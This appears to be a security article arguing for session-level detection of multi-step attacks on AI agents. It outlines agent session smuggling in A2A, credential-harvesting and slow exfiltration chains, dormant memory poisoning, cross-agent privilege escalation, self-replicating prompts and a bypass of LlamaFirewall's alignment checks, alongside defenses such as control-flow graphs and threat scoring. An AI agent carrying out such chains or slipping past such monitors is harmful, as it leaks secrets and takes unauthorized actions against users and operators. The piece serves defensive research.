In March 2025, Microsoft researchers demonstrated that their own multi-agent framework Magentic-One executes arbitrary malicious code 97% of the time when a compromised file enters the pipeline. Not because any single request was obviously malicious — but because the attack unfolded across multiple steps, each one looking perfectly normal in isolation.
This is the fundamental problem with today’s AI security: we’re checking each request individually while attackers are thinking in sequences.
The Attack That Looks Normal
Here’s a real attack pattern documented by Palo Alto Unit 42’s research on Google’s A2A protocol:
Turn 1: Research agent asks financial agent a normal question
Turn 2: Financial agent responds with its capabilities
Turn 3: Research agent asks a follow-up that subtly probes system instructions
Turn 4: Financial agent leaks tool configuration
Turn 5: Research agent smuggles a hidden instruction
Turn 6: Financial agent executes an unauthorized stock trade
Each individual message passes every content filter. No prompt injection detected. No sensitive data in transit. No dangerous tool call. But the sequence is a textbook social engineering attack — reconnaissance, trust building, exploitation.
Unit 42 calls this Agent Session Smuggling. It exploits A2A’s stateful protocol design: agents remember previous context, allowing attackers to refine their approach across turns.
Agents Replay the APT Playbook
If you’ve worked in traditional security, this should sound familiar. It’s the same kill chain that APT groups have used for decades — just with a new attack surface.
Harvard’s Berkman Klein Center formalized this as the Promptware Kill Chain (arXiv:2601.09625), mapping it directly to the MITRE ATT&CK framework:
| ATT&CK Phase | Traditional Attack | Agent Attack Equivalent |
|---|---|---|
| Reconnaissance | Port scanning, OSINT | Enumerating available tools, probing agent capabilities |
| Initial Access | Phishing email | Prompt injection via malicious document, email, or web content |
| Execution | Malware execution | Tool call executing malicious operation |
| Persistence | Registry keys, cron jobs | Memory poisoning, RAG data contamination |
| Privilege Escalation | Kernel exploit | Jailbreak, confused deputy attack |
| Lateral Movement | Pass-the-hash, RDP | Cross-agent message manipulation, self-replicating prompts |
| Exfiltration | C2 channel | Data sent via URL fetch, email tool, or search query |
This isn’t theoretical. Anthropic reported the first real-world AI-orchestrated cyber espionage campaign (GTG-1002) in September 2025 — a state-sponsored group used a jailbroken agent to autonomously complete 80-90% of a complex intrusion, including credential extraction, system analysis, and data exfiltration across ~30 targets.
Why Request-Level Detection Fails
Every major AI security product today operates at the request level:
Request comes in → scan for prompt injection → scan for PII → pass/block
Response comes back → scan for sensitive data → pass/block
Forget everything → next request starts fresh
This catches the obvious stuff. But it structurally cannot detect:
1. Credential Harvesting Chains
Turn 2: read_file("~/.env") ← Normal. Developers read configs.
Turn 5: curl POST https://external ← Normal. Apps make HTTP requests.
Together: read secrets → exfiltrate ← Attack.
2. Slow Data Exfiltration
An attacker doesn’t steal everything at once. They take one piece per session — an API key today, a database password tomorrow, a customer list next week. Each individual access looks routine. Security researchers call this salami slicing: 10 support tickets over a week, each slightly redefining agent constraints, until unauthorized actions become “normal.”
3. Memory Poisoning with Delayed Triggers
Palo Alto Unit 42 demonstrated that injected content can sit dormant in agent memory for days or weeks, only activating when an unrelated interaction triggers it. Their research found that once memory is poisoned, 87% of downstream decisions become compromised within 4 hours of the trigger event. Unlike prompt injection (which disappears when the session ends), memory poisoning creates persistent compromise.
4. Cross-Agent Privilege Escalation
In multi-agent systems, a low-privilege agent can manipulate a high-privilege agent into acting on its behalf. The COLM 2025 paper showed this works even when individual agents refuse unsafe operations — by manipulating the orchestrator’s scheduling metadata (particularly error reports), attackers hijack the entire system’s control flow.
What the Research Says About Detection
Academic and industry research is converging on one conclusion: detection must be session-level, not request-level.
ControlValve (Microsoft Research, 2025)
Microsoft’s own answer to the Magentic-One vulnerability. Instead of checking individual requests, ControlValve generates permitted control-flow graphs for multi-agent systems — a whitelist of allowed execution sequences. Any deviation triggers an alert. This is directly borrowed from Control-Flow Integrity (CFI) in systems security, adapted for agent orchestration.
Key property: it’s zero-shot and task-agnostic. No training data needed, works across different agent configurations.
LlamaFirewall (Meta, 2025)
Meta’s open-source guardrail includes Agent Alignment Checks — the first real-time audit of an agent’s chain-of-thought reasoning. It reduced attack success rates by 90%.
But here’s the catch: the ControlValve paper demonstrated that LlamaFirewall’s alignment checks can be bypassed by carefully constructed attack sequences. Single-step alignment verification isn’t enough when attackers think in multi-step chains.
OWASP Top 10 for Agentic Applications (2025)
Three of the top 10 risks directly relate to chain attacks:
- ASI06 (Memory & Context Manipulation): Memory poisoning as the persistence layer for cross-session attacks
- ASI07 (Insecure Inter-Agent Communication): Forged agent messages enabling lateral movement
- ASI08 (Cascading Failures): Small misalignments amplifying into system-wide failures across agent chains
From the OWASP report:
“Agentic systems chain decisions and actions across multiple steps, and small inaccuracies compound and propagate, so what begins as a minor misalignment in one agent can trigger a system-wide outage.”
MITRE ATLAS Update (October 2025)
MITRE added 14 agent-specific attack techniques to their ATLAS framework, developed in collaboration with Zenity Labs. New entries include AI Agent Context Poisoning, Memory Manipulation, Thread Injection, and Modify AI Agent Configuration — all multi-step attack patterns that require temporal correlation to detect.
Chain Detection: The Missing Layer
The gap in today’s AI security stack is clear:
| Existing Defense | What It Catches | What It Misses |
|---|---|---|
| PI detection (PromptGuard, etc.) | Single-request injection | Multi-step sequences |
| LlamaFirewall alignment check | Single-step goal deviation | Carefully crafted sequences that bypass alignment |
| DLP scanning | Single-request data leakage | Slow exfiltration across sessions |
| Tool Guard rules | Individual dangerous tool calls | Combinations of harmless calls that form an attack |
What’s missing is a layer that correlates signals across time:
Event timeline for Session X:
t=0 Normal conversation score: 0
t=3 PI detection triggered score: +30
t=5 Sensitive file accessed score: +10
t=7 DLP found API key in content score: +20
t=9 External HTTP request attempted score: +40
─────────
t=9 Chain rule matched: score: 100 → BLOCK
"credential-harvest"
(read .env → external request)
This is the same architectural pattern as EDR behavioral detection. CrowdStrike’s Falcon agent doesn’t just check if a single system call is malicious — it evaluates sequences of operations over time: “login from new IP → disable antivirus → inject code” is a pattern, not three independent events.
SentinelOne’s Storyline technology automatically maps event sequences into visual attack chains, tracking the full attack path from initial compromise to impact. The equivalent for agents is mapping tool call sequences into attack chain timelines — detecting the pattern, not just the individual events.
The Six Chain Patterns
Based on documented attacks, PoCs, and academic research, these are the chain patterns that matter most:
1. Credential Harvesting
read_file(.env/.aws/credentials) → url_fetch(external) or send_email
Source: arXiv:2510.09093, real-world CVE-2025-68664
2. Data Exfiltration
list_files → read_file(sensitive) × N → write_file or send_email
Source: Unit 42 session smuggling PoC
3. Reconnaissance → Extract
list_tools → read_config → system_info → targeted exploitation
Source: Anthropic GTG-1002 campaign
4. Memory Poisoning Injected content → [days/weeks dormant] → triggered behavioral change Source: Unit 42 memory poisoning research, MINJA (NeurIPS)
5. Privilege Escalation Low-privilege data read → call to high-privilege agent → execute privileged action Source: COLM 2025, SEAgent framework
6. Self-Replication
read_message → generate_reply_with_payload → send_message
Source: Morris II worm (arXiv:2403.02817)
Where We Go From Here
Chain detection for AI agents is where behavioral detection was for endpoint security in 2012 — everyone agrees it’s needed, few have built it, and the early movers will define the category.
The technical requirements are clear:
- Stateful session tracking — maintain context across turns, not just individual requests
- Temporal correlation — detect patterns that span minutes, hours, or days
- Graduated response — not binary pass/block, but progressive threat scoring with escalating restrictions
- Pattern library — a growing database of known attack chain signatures, updated from real-world incidents
The research is there. The attack patterns are documented. The question is who builds the detection layer that connects the dots.
References
Academic Papers
- Wu et al., “Multi-Agent Systems Execute Arbitrary Malicious Code,” COLM 2025. OpenReview
- Wu & Shmatikov, “Breaking and Fixing Defenses Against Control-Flow Hijacking in Multi-Agent Systems,” arXiv:2510.17276. Microsoft Research
- “The Promptware Kill Chain,” arXiv:2601.09625. Harvard Berkman Klein Center / Lawfare.
- Cohen et al., “Here Comes The AI Worm,” arXiv:2403.02817.
- “LlamaFirewall,” arXiv:2505.03574. Meta AI.
- Kim et al., “Prompt Flow Integrity,” arXiv:2503.15547. Seoul National University.
- “SEAgent: Mandatory Access Control for LLM Agents,” arXiv:2601.11893.
- “Exploiting Web Search Tools of AI Agents for Data Exfiltration,” arXiv:2510.09093.
Industry Reports & Frameworks
- OWASP Top 10 for Agentic Applications, December 2025. OWASP
- MITRE ATLAS + Zenity Labs agent-specific techniques, October 2025. MITRE
- CSA MAESTRO Threat Modeling Framework. CSA
- NIST AI Agent Standards Initiative, February 2026. NIST
- AWS Agentic AI Security Scoping Matrix. AWS
Real-World Incidents
- Anthropic, “Disrupting the first AI-orchestrated cyber espionage campaign” (GTG-1002). Anthropic
- CVE-2025-68664 (LangGrinch), CVSS 9.3. NVD
- Invariant Labs, MCP Tool Poisoning Attacks. Invariant Labs
- Unit 42, Agent Session Smuggling in A2A Systems. Unit 42
- Unit 42, Indirect Prompt Injection Poisons AI Long-term Memory. Unit 42